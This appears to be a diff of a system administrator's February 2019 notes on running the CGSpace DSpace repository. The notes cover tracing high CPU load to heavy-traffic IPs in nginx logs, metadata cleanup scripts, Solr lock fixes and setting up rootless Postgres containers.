     Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
     The top IPs before, during, and after this latest alert tonight were:
     
    -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         245 207.46.13.5
         332 54.70.40.11
         385 5.143.231.38
    @@ -28,7 +28,7 @@ The top IPs before, during, and after this latest alert tonight were:
     The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
     There were just over 3 million accesses in the nginx logs last month:
     
    -# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
    +# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
     3018243
     
     real    0m19.873s
    @@ -49,7 +49,7 @@ sys     0m1.979s
     Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
     The top IPs before, during, and after this latest alert tonight were:
     
    -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         245 207.46.13.5
         332 54.70.40.11
         385 5.143.231.38
    @@ -65,14 +65,14 @@ The top IPs before, during, and after this latest alert tonight were:
     The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
     There were just over 3 million accesses in the nginx logs last month:
     
    -# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
    +# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
     3018243
     
     real    0m19.873s
     user    0m22.203s
     sys     0m1.979s
     "/>
    -
    +
     
     
         
    @@ -163,7 +163,7 @@ sys     0m1.979s
     
  • Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
  • The top IPs before, during, and after this latest alert tonight were:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         245 207.46.13.5
         332 54.70.40.11
         385 5.143.231.38
    @@ -179,7 +179,7 @@ sys     0m1.979s
     
  • The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
  • There were just over 3 million accesses in the nginx logs last month:
  • -
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
    +
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
     3018243
     
     real    0m19.873s
    @@ -198,7 +198,7 @@ sys     0m1.979s
     
    • Another alert from Linode about CGSpace (linode18) this morning, here are the top IPs in the web server logs before, during, and after that time:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Feb/2019:0(1|2|3|4|5)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Feb/2019:0(1|2|3|4|5)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         284 18.195.78.144
         329 207.46.13.32
         417 35.237.175.180
    @@ -219,7 +219,7 @@ sys     0m1.979s
     
  • This is seriously getting annoying, Linode sent another alert this morning that CGSpace (linode18) load was 377%!
  • Here are the top IPs before, during, and after that time:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         325 85.25.237.71
         340 45.5.184.72
         431 5.143.231.8
    @@ -238,7 +238,7 @@ sys     0m1.979s
     
    • This user was making 20–60 requests per minute this morning… seems like I should try to block this type of behavior heuristically, regardless of user agent!
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Feb/2019" | grep 195.201.104.240 | grep -o -E '03/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 20
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Feb/2019" | grep 195.201.104.240 | grep -o -E '03/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 20
          19 03/Feb/2019:07:42
          20 03/Feb/2019:07:12
          21 03/Feb/2019:07:27
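
To explore the idea of flagging this behavior regardless of user agent, here is a minimal sketch that counts one IP's requests per minute and reports the minutes at or above a threshold. It assumes nginx combined-format lines with the IP first and the timestamp in square brackets; `busy_minutes` and the default threshold of 20 are hypothetical choices, not an existing nginx or DSpace feature:

```python
import re
from collections import Counter

# Captures "03/Feb/2019:07:42" from "[03/Feb/2019:07:42:13 +0000]"
MINUTE = re.compile(r"\[(\d{2}/\w{3}/\d{4}:\d{2}:\d{2})")


def busy_minutes(lines, ip, threshold=20):
    """Return {minute: request count} for minutes where `ip` made
    at least `threshold` requests."""
    per_minute = Counter()
    for line in lines:
        if line.startswith(ip + " "):
            match = MINUTE.search(line)
            if match:
                per_minute[match.group(1)] += 1
    return {minute: n for minute, n in per_minute.items() if n >= threshold}
```

A real block would more likely live in the nginx rate-limiting configuration; this only helps decide what a sensible threshold might be.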
    @@ -262,7 +262,7 @@ sys     0m1.979s
     
    • At least they re-used their Tomcat session!
    -
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240' dspace.log.2019-02-03 | sort | uniq | wc -l
    +
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240' dspace.log.2019-02-03 | sort | uniq | wc -l
     1
     
    • This user was making requests to /browse, which is not currently under the existing rate limiting of dynamic pages in our nginx config
    @@ -287,7 +287,7 @@ COPY 321
    • Discuss the new IITA research theme field with Abenet and decide that we should use cg.identifier.iitatheme
    • This morning there was another alert from Linode about the high load on CGSpace (linode18), here are the top IPs in the web server logs before, during, and after that time:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         589 2a01:4f8:140:3192::2
         762 66.249.66.219
         889 35.237.175.180
    @@ -318,12 +318,12 @@ COPY 321
     
    -
    $ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p 'fuu' -d
    -$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p 'fuu' -d
    +
    $ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p 'fuu' -d
    +$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p 'fuu' -d
     
    • I applied them on DSpace Test and CGSpace and started a full Discovery re-index:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
     
    • Peter had marked several terms with || to indicate multiple values in his corrections so I will have to go back and do those manually:
    • @@ -344,7 +344,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
    • Then I used csvcut to get only the CTA subject columns:
    -
    $ csvcut -c "id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]" /tmp/cta.csv > /tmp/cta-subjects.csv
    +
    $ csvcut -c "id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]" /tmp/cta.csv > /tmp/cta-subjects.csv
     
    • After that I imported the CSV into OpenRefine where I could properly identify and edit the subjects as multiple values
    • Then I imported it back into CGSpace:
    • @@ -354,7 +354,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
    • Another day, another alert about high load on CGSpace (linode18) from Linode
    • This time the load average was 370% and the top ten IPs before, during, and after that time were:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         689 35.237.175.180
        1236 5.9.6.51
        1305 34.218.226.147
    @@ -368,7 +368,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
     
    • Looking closer at the top users, I see 45.5.186.2 is in Brazil and was making over 100 requests per minute to the REST API:
    -
    # zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E '06/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E '06/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
         118 06/Feb/2019:05:46
         119 06/Feb/2019:05:37
         119 06/Feb/2019:05:47
    @@ -382,7 +382,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
     
    • I was thinking of rate limiting those because I assumed most of them would be errors, but actually most are HTTP 200 OK!
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '06/Feb/2019' | grep 45.5.186.2 | awk '{print $9}' | sort | uniq -c
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '06/Feb/2019' | grep 45.5.186.2 | awk '{print $9}' | sort | uniq -c
       10411 200
           1 301
           7 302
    @@ -392,7 +392,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
     
    • I should probably start looking at the top IPs for web (XMLUI) and for API (REST and OAI) separately:
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         328 220.247.212.35
         372 66.249.66.221
         380 207.46.13.2
    @@ -403,7 +403,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
        1236 5.9.6.51
        1554 66.249.66.219
        4942 85.25.237.71
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          10 66.249.66.221
          26 66.249.66.219
          69 5.143.231.8
    @@ -419,7 +419,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
     
  • Linode sent an alert last night that the load on CGSpace (linode18) was over 300%
  • Here are the top IPs in the web server and API logs before, during, and after that time, respectively:
  • -
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "06/Feb/2019:(17|18|19|20|23)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "06/Feb/2019:(17|18|19|20|23)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           5 66.249.66.209
           6 2a01:4f8:210:51ef::2
           6 40.77.167.75
    @@ -430,7 +430,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
          20 95.108.181.88
          27 66.249.66.219
        2381 45.5.186.2
    -# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Feb/2019:(17|18|19|20|23)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Feb/2019:(17|18|19|20|23)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         455 45.5.186.2
         506 40.77.167.75
         559 54.70.40.11
    @@ -444,7 +444,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
     
    • Then again this morning another alert:
    -
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "07/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "07/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           5 66.249.66.223
           8 104.198.9.108
          13 110.54.160.222
    @@ -455,7 +455,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
        4529 45.5.186.2
        4661 205.186.128.185
        4661 70.32.83.92
    -# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "07/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "07/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         145 157.55.39.237
         154 66.249.66.221
         214 34.218.226.147
    @@ -513,7 +513,7 @@ Please see the DSpace documentation for assistance.
     
  • Linode sent alerts about CPU load yesterday morning, yesterday night, and this morning! All over 300% CPU load!
  • This is just for this morning:
  • -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "09/Feb/2019:(07|08|09|10|11)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "09/Feb/2019:(07|08|09|10|11)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         289 35.237.175.180
         290 66.249.66.221
         296 18.195.78.144
    @@ -524,7 +524,7 @@ Please see the DSpace documentation for assistance.
         742 5.143.231.38
        1046 5.9.6.51
        1331 66.249.66.219
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "09/Feb/2019:(07|08|09|10|11)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "09/Feb/2019:(07|08|09|10|11)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           4 66.249.83.30
           5 49.149.10.16
           8 207.46.13.64
    @@ -547,7 +547,7 @@ Please see the DSpace documentation for assistance.
     
    • Linode sent another alert about CGSpace (linode18) CPU load this morning, here are the top IPs in the web server XMLUI and API logs before, during, and after that time:
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         232 18.195.78.144
         238 35.237.175.180
         281 66.249.66.221
    @@ -558,7 +558,7 @@ Please see the DSpace documentation for assistance.
         444 2a01:4f8:140:3192::2
        1171 5.9.6.51
        1196 66.249.66.219
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           6 112.203.241.69
           7 157.55.39.149
           9 40.77.167.178
    @@ -572,16 +572,16 @@ Please see the DSpace documentation for assistance.
     
    • Another interesting thing might be the total number of requests for web and API services during that time:
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE "10/Feb/2019:0(5|6|7|8|9)"
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE "10/Feb/2019:0(5|6|7|8|9)"
     16333
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE "10/Feb/2019:0(5|6|7|8|9)"
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE "10/Feb/2019:0(5|6|7|8|9)"
     15964
     
    • Also, the number of unique IPs served during that time:
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq | wc -l
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq | wc -l
     1622
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq | wc -l
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq | wc -l
     95
     
    • It’s very clear to me now that the API requests are the heaviest!
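One way to read the four counts above is as an average number of requests per unique client IP. This is only a rough sketch: the numbers are copied from the `grep -c` and `wc -l` output for 10/Feb/2019 05:00 to 09:59, and `requests_per_ip` is a hypothetical helper name. A per-IP average says nothing about how expensive each request is, so it supports the "API is heaviest" reading without proving it.

```python
# Counts copied from the command output above (10/Feb/2019, hours 05-09).
web_requests, web_ips = 16333, 1622  # XMLUI: access, error, library-access logs
api_requests, api_ips = 15964, 95    # API: oai, rest, statistics logs


def requests_per_ip(requests: int, unique_ips: int) -> float:
    """Average number of requests made by each unique client IP."""
    return requests / unique_ips


web_avg = requests_per_ip(web_requests, web_ips)
api_avg = requests_per_ip(api_requests, api_ips)

print(f"web: {web_avg:.1f} requests per IP")
print(f"api: {api_avg:.1f} requests per IP")
print(f"api clients are {api_avg / web_avg:.1f}x as active on average")
```

Roughly the same number of requests came from far fewer API clients, which is why rate limiting a handful of API users would likely have a larger effect than limiting web users.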
    • @@ -643,7 +643,7 @@ Please see the DSpace documentation for assistance.
    • On a similar note, I wonder if we could use the performance-focused libvips and the third-party jlibvips Java library in DSpace
    • Testing the vipsthumbnail command line tool with this CGSpace item that uses CMYK:
    -
    $ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o '%s.jpg[Q=92,optimize_coding,strip]'
    +
    $ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o '%s.jpg[Q=92,optimize_coding,strip]'
     
    • (DSpace 5 appears to use JPEG 92 quality so I do the same)
    • Thinking about making “top items” endpoints in my dspace-statistics-api
    • @@ -693,7 +693,7 @@ dspacestatistics=# SELECT * FROM items WHERE downloads > 0 ORDER BY downloads
    • Thierry from CTA is having issues with his account on DSpace Test, and there is no admin password reset function on DSpace (only via email, which is disabled on DSpace Test), so I have to delete and re-create his account:
    $ dspace user --delete --email blah@cta.int
    -$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password 'blah'
    +$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password 'blah'
     
    • On this note, I saw a thread on the dspace-tech mailing list that says this functionality exists if you enable webui.user.assumelogin = true
    • I will enable this on CGSpace (#411)
    • @@ -728,14 +728,14 @@ $ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspace
    • After running the playbook CGSpace came back up, but I had an issue with some Solr cores not being loaded (similar to last month) and this was in the Solr log:
    -
    2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
    +
    2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
     
    • The issue last month was address space, which is now set as LimitAS=infinity in tomcat7.service
    • I re-ran the Ansible playbook to make sure all configs etc were the same, then rebooted the server
    • Still the error persists after reboot
    • I will try to stop Tomcat and then remove the locks manually:
    -
    # find /home/cgspace.cgiar.org/solr/ -iname "write.lock" -delete
    +
    # find /home/cgspace.cgiar.org/solr/ -iname "write.lock" -delete
     
    • After restarting Tomcat the usage statistics are back
    • Interestingly, many of the locks were from last month, last year, and even 2015! I’m pretty sure that’s not supposed to be how locks work…
    • @@ -795,10 +795,10 @@ $ podman volume create dspacedb_data $ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine $ createuser -h localhost -U postgres --pwprompt dspacetest $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;' $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost dspace_2019-02-11.backup $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;' +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
    • And it’s all running without root!
    • Then re-create my Artifactory container as well, taking into account ulimit open file requirements by Artifactory as well as the user limitations caused by rootless subuid mappings:
    • @@ -818,12 +818,12 @@ $ podman start artifactory
    • I ran DSpace’s cleanup task on CGSpace (linode18) and there were errors:
    $ dspace cleanup -v
    -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(162844) is still referenced from table "bundle".
    +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(162844) is still referenced from table "bundle".
     
    • The solution is, as always:
    -
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);'
    +
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);'
     UPDATE 1
     
    • I merged the Atmire Metadata Quality Module (MQM) changes to the 5_x-prod branch and deployed it on CGSpace (#407)
    • @@ -834,7 +834,7 @@ UPDATE 1
    • Jesus fucking Christ, Linode sent an alert that CGSpace (linode18) was using 421% CPU for a few hours this afternoon (server time):
    • There seems to have been a lot of activity in XMLUI:
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1236 18.212.208.240
        1276 54.164.83.99
        1277 3.83.14.11
    @@ -845,7 +845,7 @@ UPDATE 1
        1327 52.54.252.47
        1477 5.9.6.51
        1861 94.71.244.172
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           8 42.112.238.64
           9 121.52.152.3
           9 157.55.39.50
    @@ -856,15 +856,15 @@ UPDATE 1
          28 66.249.66.219
          43 34.209.213.122
         178 50.116.102.77
    -# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq | wc -l
    +# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq | wc -l
     2727
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq | wc -l
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq | wc -l
     186
     
    • 94.71.244.172 is in Greece and uses the user agent “Indy Library”
    • At least they are re-using their Tomcat session:
    -
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172' dspace.log.2019-02-18 | sort | uniq | wc -l
    +
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172' dspace.log.2019-02-18 | sort | uniq | wc -l
     
    • The following IPs were all hitting the server hard simultaneously and are located on Amazon and use the user agent “Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0”:

      @@ -886,7 +886,7 @@ UPDATE 1

      For reference most of these IPs hitting the XMLUI this afternoon are on Amazon:

    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 30
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 30
        1173 52.91.249.23
        1176 107.22.118.106
        1178 3.88.173.152
    @@ -920,7 +920,7 @@ UPDATE 1
     
    • In the case of 52.54.252.47 they are only making about 10 requests per minute during this time (albeit from dozens of concurrent IPs):
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E '18/Feb/2019:1[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E '18/Feb/2019:1[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
          10 18/Feb/2019:17:20
          10 18/Feb/2019:17:22
          10 18/Feb/2019:17:31
    @@ -935,7 +935,7 @@ UPDATE 1
     
  • As this user agent is not recognized as a bot by DSpace this will definitely fuck up the usage statistics
  • There were 92,000 requests from these IPs alone today!
  • -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'
     92756
     
    • I will add this user agent to the “badbots” rate limiting in our nginx configuration
    • @@ -943,7 +943,7 @@ UPDATE 1
    • IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary
